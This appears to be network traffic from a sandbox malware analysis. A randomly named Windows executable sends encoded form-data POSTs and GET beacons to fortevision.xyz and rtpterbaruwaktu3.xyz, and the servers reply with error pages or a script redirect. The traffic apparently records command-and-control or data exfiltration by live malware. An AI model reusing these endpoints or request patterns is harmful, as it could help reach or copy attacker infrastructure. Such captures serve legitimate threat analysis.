                                                                    Data Ascii: QbUPL=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tQp7OZyrTOyR0INs6wzAR1jpI7vJSmppbWUgppLF+xuBX58CDw==
                                                                    Jan 11, 2025 08:17:26.455938101 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.74998313.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:28.553397894 CET764OUTPOST /dash/ HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.fortevision.xyz
                                                                    Referer: http://www.fortevision.xyz/dash/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 66 7a 76 52 4b 70 67 49 67 42 75 46 44 6f 42 59 42 78 77 33 75 42 76 31 34 50 7a 33 70 35 50 79 47 38 50 70 6d 38 4f 77 54 6c 4f 67 65 39 68 4e 5a 53 57 65 4e 49 32 76 2f 6a 30 2b 39 38 45 78 46 63 2f 75 4a 7a 69 33 74 65 5a 64 65 65 4e 55 50 75 50 6e 63 68 79 7a 66 65 6b 5a 70 75 56 74 65 77 4f 54 32 6f 4c 31 76 53 46 39 64 73 70 41 76 41 78 58 37 41 74 6f 44 6c 75 55 49 4b 6d 5a 4d 2b 63 34 65 4d 4f 67 53 2f 73 50 6b 62 53 4d 35 4c 2f 46 41 30 63 5a 58 51 34 6b 4c 2f 6b 68 47 4c 72 61 72 64 47 56 44 32 6f 5a 74 53 63 4c 4d 30 4b 56 4c 53 51 51 2b 50 57 50 54 67 3d
                                                                    Data Ascii: QbUPL=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkbSM5L/FA0cZXQ4kL/khGLrardGVD2oZtScLM0KVLSQQ+PWPTg=
                                                                    Jan 11, 2025 08:17:29.005220890 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.74998413.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:31.098731995 CET1777OUTPOST /dash/ HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.fortevision.xyz
                                                                    Referer: http://www.fortevision.xyz/dash/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 63 54 76 51 2f 6c 67 4a 44 35 75 58 7a 6f 42 53 68 78 78 33 75 42 69 31 2b 6e 4a 33 70 31 31 79 45 30 50 6f 41 67 4f 31 6d 5a 4f 37 4f 39 68 51 4a 54 78 44 39 49 2f 76 38 62 77 2b 35 51 45 78 46 63 2f 75 49 44 69 6d 34 71 5a 62 65 65 53 58 50 75 44 73 38 68 4b 7a 66 58 54 5a 70 72 6f 73 76 51 4f 54 57 34 4c 33 39 36 46 30 64 73 33 42 76 42 78 58 37 4e 7a 6f 46 42 31 55 49 2f 78 5a 4d 47 63 39 37 34 55 30 7a 58 52 5a 46 48 77 53 71 66 53 46 7a 73 4c 65 46 6f 67 6d 4d 43 47 39 56 54 50 57 64 78 34 55 33 2f 58 50 63 4b 39 41 76 42 63 54 74 44 73 42 4e 76 4f 53 46 43 4f 59 35 33 2b 76 51 4d 6b 72 55 46 63 49 5a 39 76 67 48 75 59 4b 46 75 51 79 49 58 41 49 49 55 4c 43 48 72 5a 4d 72 39 4c 6e 4f 53 51 52 6b 31 32 4b 45 6a 6e 44 6f 57 44 4e 2b 51 6f 43 4a 46 43 32 45 51 46 4b 77 78 68 43 36 74 6a 41 59 4e 38 79 75 7a 48 78 33 73 44 76 56 4d 34 44 59 59 41 74 41 7a 6b [TRUNCATED]
                                                                    Data Ascii: QbUPL=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZScTvQ/lgJD5uXzoBShxx3uBi1+nJ3p11yE0PoAgO1mZO7O9hQJTxD9I/v8bw+5QExFc/uIDim4qZbeeSXPuDs8hKzfXTZprosvQOTW4L396F0ds3BvBxX7NzoFB1UI/xZMGc974U0zXRZFHwSqfSFzsLeFogmMCG9VTPWdx4U3/XPcK9AvBcTtDsBNvOSFCOY53+vQMkrUFcIZ9vgHuYKFuQyIXAIIULCHrZMr9LnOSQRk12KEjnDoWDN+QoCJFC2EQFKwxhC6tjAYN8yuzHx3sDvVM4DYYAtAzkL1e8PV0b2qNyQhrB5nAOT/STgXu0imYFG/JZ6aGZZSaaj4zoIjouWp7Dv7YRISiubAdQ+tv46PlbN0YuNQuuTh1yFtRY6wOoGCywSOCM+Ml8ed90o9N8qo1HW3sWUjIQI35VcEFuQyM6hzyPt/JvQekww5cniLvkBWpw1QfS4cyCC5PyfyR8d5sKG7n9zP9g7EMxGCqGUX5JYinl4+mVGActjAkCzcM3ZvtfWOmrVOsH4a6dryZ9k6mIUQpvU9pij3DO/CXpYKqVWxyHL6p/he0i1RgHmu7R1r3oq3gj0Xj+Bhq9LCJmJVNzSJswLJA/q9GcB6OsrBaatfdOkcrV/dzY6gLTWwKimZTSCZnggtYixfstzN9Mxv2pdbRlHnBwWUbAlkN33xgLvPihiy3MK2Q7qGOoi+BuFAmWkzXFVUZ/UcrCVqGfzRQyAQrGuheAPsSyb8rZIedg74Xd2DvX4vLkolRZ7ME50Qpxwe/xjKylRW7pMRoHslBQ0ASmp2nLl6XuzEuJgb5mEjLK5gGJ5c55uDaEudVCL52MmUwPuF1uyEChcdhDKx4PDzRvw/V7Kxq1jyEj4iQeXPlIV0HafXNPbtnf8c2Q918iHapiTRzo2ba0oZMkMiFKCRq5tu0GQIZIqoYmjIeyWG/xpBycl0JLdjEeS5tDB5 [TRUNCATED]
                                                                    Jan 11, 2025 08:17:31.571757078 CET73INHTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.74998513.248.169.48806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:33.639498949 CET483OUTGET /dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:17:34.103887081 CET399INHTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Sat, 11 Jan 2025 07:17:34 GMT
                                                                    content-length: 278
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 66 34 3d 54 4a 59 58 45 4c 6e 68 46 4a 68 6c 26 51 62 55 50 4c 3d 59 4d 48 42 75 64 6f 48 49 55 78 48 2b 75 57 4c 5a 71 6a 42 57 4f 4f 65 7a 49 6e 43 7a 36 41 6b 63 6a 41 49 34 6b 75 6a 54 38 79 71 5a 4d 68 38 50 77 64 43 59 68 55 63 58 46 38 48 6d 37 4e 75 77 4a 72 6b 6d 38 31 4b 30 6b 41 58 68 47 77 55 74 78 31 51 31 4c 41 67 55 71 33 58 63 5a 77 71 7a 74 48 53 2f 4d 68 78 78 48 52 79 35 36 43 33 78 4d 4b 53 55 65 6d 78 66 50 57 34 71 76 59 4e 2b 63 33 47 64 74 36 33 69 50 38 7a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z"}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.749986103.21.221.87806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:39.417825937 CET759OUTPOST /mv7p/ HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.rtpterbaruwaktu3.xyz
                                                                    Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 54 53 53 63 6a 42 30 75 5a 45 6c 38 57 4d 76 4e 42 67 53 6e 38 4a 36 39 6e 45 59 32 46 58 34 68 77 71 44 44 6d 4e 74 6d 56 48 71 34 2b 38 46 59 54 4e 53 31 36 47 2b 45 44 30 72 56 76 74 6e 79 67 77 7a 6b 2b 43 51 4c 34 63 72 4b 5a 6b 70 4c 61 57 78 47 6b 4f 4c 34 53 34 46 70 5a 6b 49 59 65 53 67 2f 38 70 76 2f 58 58 62 32 4f 6f 69 54 5a 45 6c 49 38 52 38 4c 46 4b 66 66 4b 6a 5a 64 6d 4d 4f 49 41 62 49 7a 68 77 34 2f 48 62 4b 6b 2b 63 52 69 43 34 64 56 71 49 58 76 6b 62 2b 79 75 44 78 50 74 4e 4d 69 4e 76 58 33 74 65 32 4a 46 6f 69 6e 50 34 74 38 34 74 37 53 31 30 67 71 38 65 4f 43 51 3d 3d
                                                                    Data Ascii: QbUPL=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRiC4dVqIXvkb+yuDxPtNMiNvX3te2JFoinP4t84t7S10gq8eOCQ==
                                                                    Jan 11, 2025 08:17:40.319107056 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:40 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.749987103.21.221.87806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:41.958693027 CET779OUTPOST /mv7p/ HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.rtpterbaruwaktu3.xyz
                                                                    Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 77 2f 34 68 56 57 44 53 53 52 74 6e 56 48 71 67 4f 39 75 58 7a 4d 2f 31 36 4b 49 45 42 67 72 56 76 35 6e 79 68 41 7a 6b 4a 32 52 4a 6f 63 74 42 35 6b 72 54 36 57 78 47 6b 4f 4c 34 53 38 2f 70 66 4d 49 5a 75 69 67 2f 65 42 73 6a 6e 58 45 69 65 6f 69 5a 35 46 75 49 38 52 65 4c 45 57 35 66 49 72 5a 64 6a 6f 4f 49 53 6a 4c 36 68 77 2b 77 6e 61 7a 30 73 39 5a 72 33 46 36 64 4d 45 31 31 58 4c 6e 7a 59 43 54 56 50 42 67 38 63 58 73 7a 76 36 41 65 6a 31 58 6c 4f 38 31 78 61 5a 61 4e 43 52 4b 6e 75 2f 4b 55 69 4b 4b 76 41 4f 4b 37 6f 77 51 46 46 31 58 4f 6b 4a 51 55 71 77 3d
                                                                    Data Ascii: QbUPL=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cXszv6Aej1XlO81xaZaNCRKnu/KUiKKvAOK7owQFF1XOkJQUqw=
                                                                    Jan 11, 2025 08:17:42.840620995 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:42 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.749988103.21.221.87806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:44.505649090 CET1792OUTPOST /mv7p/ HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.rtpterbaruwaktu3.xyz
                                                                    Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 32 6e 34 68 6e 4f 44 41 44 52 74 6b 56 48 71 2b 2b 39 74 58 7a 4e 39 31 36 43 55 45 42 39 63 56 74 42 6e 7a 48 55 7a 31 73 61 52 54 34 63 74 4f 5a 6b 6d 4c 61 58 72 47 6b 65 50 34 52 55 2f 70 66 4d 49 5a 6f 75 67 6f 63 70 73 77 33 58 62 32 4f 6f 75 54 5a 45 4a 49 39 34 38 4c 48 36 50 63 34 4c 5a 63 44 34 4f 4f 68 62 4c 31 68 77 38 33 6e 61 43 30 73 78 57 72 7a 73 55 64 4d 59 50 31 56 62 6e 2f 2b 6a 65 4a 4c 45 36 70 2f 62 44 38 75 47 58 57 30 4a 51 6a 39 51 59 31 6f 35 62 49 51 78 70 6e 75 66 53 58 6c 4c 52 32 57 79 2f 2b 59 56 42 55 79 6f 48 58 6c 46 34 57 4f 62 45 7a 55 7a 71 30 72 35 69 59 42 32 54 48 70 70 72 43 74 71 2f 41 71 49 4a 34 57 32 53 58 4b 4d 75 6e 74 4e 74 5a 2f 6c 51 49 47 6e 72 72 43 6d 2f 72 58 74 72 66 6d 34 56 5a 37 4f 72 32 61 4e 32 38 49 50 42 76 75 4f 67 71 44 32 71 31 5a 64 38 51 7a 68 76 34 74 78 69 4c 4a 74 64 57 68 7a 30 73 6b 2f 77 [TRUNCATED]
                                                                    Data Ascii: QbUPL=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI22n4hnODADRtkVHq++9tXzN916CUEB9cVtBnzHUz1saRT4ctOZkmLaXrGkeP4RU/pfMIZougocpsw3Xb2OouTZEJI948LH6Pc4LZcD4OOhbL1hw83naC0sxWrzsUdMYP1Vbn/+jeJLE6p/bD8uGXW0JQj9QY1o5bIQxpnufSXlLR2Wy/+YVBUyoHXlF4WObEzUzq0r5iYB2THpprCtq/AqIJ4W2SXKMuntNtZ/lQIGnrrCm/rXtrfm4VZ7Or2aN28IPBvuOgqD2q1Zd8Qzhv4txiLJtdWhz0sk/wwVGq9UeIcHFQ6Nt9/DSv5wpOIOeCgumcdiFpatwzK3owwGceWMnLnvOM0zJYPtDV65iTqsFT3wnWnh68pL4/TlMSUAjJi0PGPhwPDzQbfRdN/IdLIaL0a8Fp7YSOgtHEAbocwO3AZlEziIxWbT73u0SjqzOMgdAzsSSvdaqnI4y5qSdJkMoSSLbKytaTdNxUyqjPOXwgeDdaCKHokKCfFE5Ako7zT0iGU3Vv+CV+QT3ffuveVz+xbrEIpaB0ZMfEUqiWVU6JtNPcSXw1w8qSNrPn+ReuxnWwRlGYvDkQB8h6fTajwE3MkOaUkXW40Rjhg5iBznTkASA6cPfmmK2E93p/n+r+nNIxRDLJdQSYPqoOD2TyLpgtQ+tY6tZtl9CmQ9ywE3khll6NuQ51BsitASbi/fap4fVjdBS4PpHxoqNlBoQkQQluIa+1IQ/rUEg+i4ZkldPyeY0sMVX//yNoVDIaUdtdtbnlsaXp2xOsrW2EJNvLi8qXfca+AqJC4dK4olQMzOgUrhnAsb1nnAG2ODAMh7v/ShwYaQycW/RdehiA4/TJ4D+yye5Co1x+sc4bZnE55YDYfTkiylbEqXxgJMscFrIqmok52zQcJ0HIkFr2+t/ZdBx35nUnKpEdporU4M4CN5pRGC0+7GDnFPPyshmn3TlDshnFsS [TRUNCATED]
                                                                    Jan 11, 2025 08:17:45.391906023 CET1033INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:45 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.749989103.21.221.87806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:47.048573017 CET488OUTGET /mv7p/?QbUPL=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOHKQPM7koR8LGBXKy+yJDj5RRAPqEofhY8WnntYYNfZxpGMdCDiinSrfj&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
